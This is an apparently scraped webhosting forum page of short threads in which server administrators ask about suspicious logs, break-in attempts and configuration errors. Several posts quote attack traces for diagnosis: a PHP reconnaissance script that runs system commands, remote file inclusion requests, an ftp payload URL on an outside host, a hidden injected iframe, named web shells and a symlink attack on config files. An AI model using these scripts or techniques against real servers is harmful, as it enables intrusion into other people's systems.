Is It A Hacking Attempt.. Request Of Wierd Files Along With Unwanted SSL Handshake
Mar 30, 2009
I see following errors in my server ie. httpd error logs:
Code:
[Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 79.132.204.192) (OpenSSL library error follows)
[Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac
[Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 60.63.241.18) (OpenSSL library error follows)
[Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol [Hint: speaking not SSL to HTTPS port!?]
[Mon Mar 30 07:23:56 2009] [error] [client 114.224.169.0] File does not exist: /var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bFT/SX00/VtJVht/D1XvJBgHP/5lll.gif
[Mon Mar 30 08:46:42 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
In last you can see that MySQL reached maximum allowed client ..and it crashed
Also, at regular intervals I see such requests:
/var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bF/SX00/VtJVht/D1XvJBgHP/5lll.gif
Also I see SSL handshake failure notices while I do not have any SSL cert or SSL running site on this server.
View 4 Replies
ADVERTISEMENT
Feb 22, 2007
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url]
[url]
[url]
[url]
[url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
View 1 Replies
View Related
Sep 13, 2007
see the log entries below:
LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
View 1 Replies
View Related
Jul 20, 2008
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
View 5 Replies
View Related
May 26, 2008
How do i can perform
- Clean up unwanted files from /tmp
- Check and clean the mail queue
- Check /proc for hidden or unwanted processes
I will be thanking the person who can give in details how to perform each point in vps server and what's the steps or commands i should follow .
View 3 Replies
View Related
Apr 19, 2008
I have worked with mod_rewrite for years and never encountered this problem. I am converting html pages to a single php file and it works perfectly. I used htaccess the rewrite the urls to appear the same so that no links would be broken or lose SEO value.
The only problem is that my friend who also helped build the sites added different directories and within those directories are index.htm files that serve as a home page for the separate directory. Like /info/index.htm and /help/index.htm within the root directory. The problem is that for some reason my mod_rewrite directs to the main index.htm rewrite even if I include the whole path to the file. In htaccess I have this so far:
RewriteEngine on
RewriteRule index.htm$ index.php [L]
RewriteRule servers.htm$ index.php?action=servers [L]
RewriteRule movies.htm$ index.php?action=movies [L]
However there is a directory named "info" and inside that directory it has an index.htm file and it seems to conflict with my first mod_rewrite. I tried using:
RewriteRule /info/index.htm$ index.php?action=info [L]
and used other methods but none seem to work any ideas?
View 1 Replies
View Related
Sep 17, 2014
I have a 6GB backup file created with another Plesk Backup Manager, now I trying to upload this backup file to my Plesk Backup Manager but after upload 3% I am getting "413 Request Entity Too Large" error, I tried with disable NGINX but still getting this error.
how can I resolve this error or is their any other way to upload my file on backup manager?
I see that Backup Manager have a file size restriction of 2GB how can I increase this?
View 2 Replies
View Related
Dec 4, 2008
I have multiple demo websites under single domain. and in each folder default page is as index.html
few days back i have observed a blank space on each index.html. when i check the code then i have found an auto generated code just after the body tag in index.html. the code is as follows
<div style="visibility:hidden"><iframe src="[url]
Also I am getting Question marks (?) in some blank spaces in HTML preview.
I have removed it but it again appears after some time. I have contacted to server support but they said that this is SQL Injection attack but there is no database connectivity involved in any of my websites.
View 12 Replies
View Related
Oct 22, 2007
I have a 777 cmod folder open. It needed to be writable so that legitimate users can upload their picture. However, i do not want people to upload .php or .php.pjepg etc to the server.
There are times that they do not use the form in my site to upload the php file. How can they do that? via perl command? And how to prevent such thing from happending?
View 8 Replies
View Related
Mar 19, 2008
Every email which gets automatically sent out from my server begins with:
Reply-To: noreply@MYDOMAIN.com
X-Mailer: PHP/4.4.7
Message-Id: <20080319210750.564111CEC004@mx.MYDOMAIN.com>
Date: Wed, 19 Mar 2008 22:07:50 +0100 (CET)
Dear DOMAIN.com Member,
This is not in our PHP code or anything, and I can't seem to remove it, its just a tad annoying. How do I remove it?
View 6 Replies
View Related
Apr 11, 2007
Yesterday i have upgraded PHP 4.4.6 to 5.x ,then checked all my scripts/pages and everything was fine.
Today i have upgraded MySQL 4 to 5 and recompiled PHP and scripts are working fine but all my Russian langauge pages are broken,i mean plain php pages ,not those that depends on scripts.
Its wierd,when i am opening them in Firefox they are opening with Win1251 encoding as supposed but when i am opening them in IE they are opening with KOI8 encoding and i have to manualy change teh encoding to Win1251 to view the pages.
This has been confirmed by other users.
View 4 Replies
View Related
Apr 11, 2007
Today i checked my server and when i click in Install a RPM it shows epmty list!
I tried to rebuild rpm databse it rebuilded it without any error but still empty?
any idea?
Also when i click on Apache Build/Upgrade Is ee this
[a fatal error or timeout occurred while processing this directive]There was an error while fetching [url]
View 9 Replies
View Related
Mar 3, 2007
I've just been having a look through my logwatch e-mail, and have seen the following that I've not seen before:
Code:
A total of 3 unidentified 'other' records logged
GET http:/ /74.52.21.101/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
GET http:/ /74.52.21.100/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
GET http:/ /74.52.21.102/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
NB. I've added a space in the URL to break the link.
what is happening here, as this looks to be something dodgy.
View 3 Replies
View Related
May 25, 2007
A client is running a server 2003 box with a couple of game servers. Unfortuantly im noticing that something isnt quite right with some of the pings on the server (at times). Went to ping localhost and look at these results.
C:Documents and SettingsAdministrator>ping 127.0.0.1
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = -987ms, Maximum = -987ms, Average = 1073740837ms
Sound like a driver issue to anyone?
View 1 Replies
View Related
Apr 11, 2008
I get this message
mysite.com has sent an incorrect or unexpected message. Error Code: -12263
Any reasons what that means/fix it?
View 2 Replies
View Related
Feb 7, 2007
Our company currently has colo in NY, UK and Geneva and have recently started to rent some space in an Australian datacentre.
In each of our existing centres we have a /26 range of IP addresses assigned to us (62 usable IPs) and we requested the same for our Australian installation.
The colo company has email us today with our IP range allocation and they seem to have chosen to allocate us 12 seperate /29 ranges (6 usable IPs).
This seems really strange to me, is it normal practise? Why not just assign us one /26 as requested.
Also, our WatchGuard firewalls only accept one range in the configuration and then you add in all of the IP aliases seperatly. If I set a the IP range to bigger than the range we own (to cover all 12 seperate ranges we've been issued) would this cause problems for the people that own the other IPs in this large range?
View 10 Replies
View Related
Mar 19, 2008
I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.
Does this belong to anyone??? Nslookup/dig reveals nothing.
This is my /var/log/messages
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - !POSSIBLE BREAK-IN ATTEMPT
View 7 Replies
View Related
Jan 31, 2007
I have started seeing the following error in the Event Viewer every day:
"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."
The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?
View 3 Replies
View Related
May 30, 2007
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?
Is this stuff largely ignored?
Is anyone else doing this?
Is there an easier way?
View 14 Replies
View Related
Jul 8, 2007
A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?
The account has been susspended for the time being.
View 12 Replies
View Related
May 7, 2009
today i have a lot of hacking on my server .
i searched for shell scripts on the server , and i found alot of it :
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
as u can see he uploaded the files on this account "koky" and redirected this files to user1,user2,user3,user4 and user5 accounts .
and he could read the config.php and then hacked the site easly !!
i read befor that the reason of this is Perl on the server , and the way to solve it to edit httpd.conf by adding this in it :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart the http :
service httpd restart
i did all of that , and when i restarted http it said :
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites got down !
i deleted :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf and then sites worked correctly .
so you all know my problem now ! and i think alot of you have the same problem , so i wish we all try to find any solution for this and knows the best way to protect pel on the server .
View 5 Replies
View Related
Jun 9, 2009
I have not been able to login to my cPanel from my desktop which runs WinXP service Pack3. Both Firefox and Internet Explorer returns the following error message
Login Attempt Failed!
Also, I am unable to connect using Filezilla Client.
However, I am able to connect to the same cPanel on my colleague's desktop which runs WinXP service Pack3 using Firefox browser or IE. We both share the same internet modem.
- I have cleared all the cookies and private data on my desktop. Still the problem persist.
- I changed to a different user on my desktop, but still could not login.
- I changed my desktop IP address but still I could not log in.
I use DSLinux from within Innotek Virtual Box and I was able to login to the same cPanel with the same details that were rejected under WinXP.
Please anyone with a solution should please advise me on what to do. Thanks in advance.
It is not convenient going to my colleagues desk to access my cPanel.
View 15 Replies
View Related
May 18, 2009
Code:
Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser
] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website setup last October.
The content of the directory:
Quote:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm
File content:
Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__
Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
View 0 Replies
View Related
Jun 24, 2008
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
View 7 Replies
View Related
Apr 12, 2008
whenever I attempt to install RoR, libsafe stops me, how do I diable libsafe so I can install RoR, then re-enable libsafe.
[root@server1 ~]# gem install rails --include-dependencies
Libsafe version 2.0.16
Detected an attempt to write across stack boundary.
Terminating /usr/bin/ruby-bin.
uid=0 euid=0 pid=20960
Call stack:
0x4c0e6871 /lib/libsafe.so.2.0.16
0x4c0e6c5d /lib/libsafe.so.2.0.16
0x80549b8 /usr/bin/ruby-bin
0x8054a52 /usr/bin/ruby-bin
0x80556af /usr/bin/ruby-bin .....
View 0 Replies
View Related
Jun 4, 2008
one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
View 0 Replies
View Related
Feb 6, 2009
a site i manage for a client is being hacked every couple of days, its not the actual site but the hosts server thats getting attacked, all sites on that server, well actually all thier servers.
They have made no attempt to sort this problem, i report it they look at the site and say "site loads fine for us" which it does.
All index files are having a base64 encode line written after the <body> tag, this adds hundreds of spam links which are hidden with display:none; they also add .html to application types in htaccess for php to run in these files too.
Problem is, i am moving the site to another host but cannot change the nameservers to the new host's untill the client returns from a holiday, so i must keep the site up on the insecure host for now.
I am removing the spam code almost daily, is there anyway i can stop this attack happening for the time being, the host does nothing.
View 14 Replies
View Related
Jun 8, 2009
As well all know there has been a hypervm exploit which may have taken down fsckvps and other hosts have been having attacks. If possible install any program that will warn you of a connection to your server and or provide input on what it may or may not be.
I myself Just had a blank php format file uploaded to a clients vps and It tried accessing other vps servers. As far as I know the ip was rapidly changing and untraceable (this may or may not be from the exploit), If anyone else is having hypervm attacks or server attacks please post here so instead of working within our own company's we are working as a group of over 10 thousand+ wht members to solve this issue ourselves.
(mods may move this wherever)
View 14 Replies
View Related
Jan 15, 2008
i have a server and these days my server is hacking by the hacker the problem is, chmod 777, there are many dir's with the chmod 777 and hacker is uploading files and creating folders under the folder which is created with chmod 777, now i just want to know how i can block the hacker, and is there any way to allow the scripts which in my server and not allow any other scripts to upload files in my server
i have linux server
View 14 Replies
View Related
Jun 27, 2007
alot of Databases in my server was hacked
Hacker can edit tables
Are there any any ports in MYSQL4?
View 14 Replies
View Related
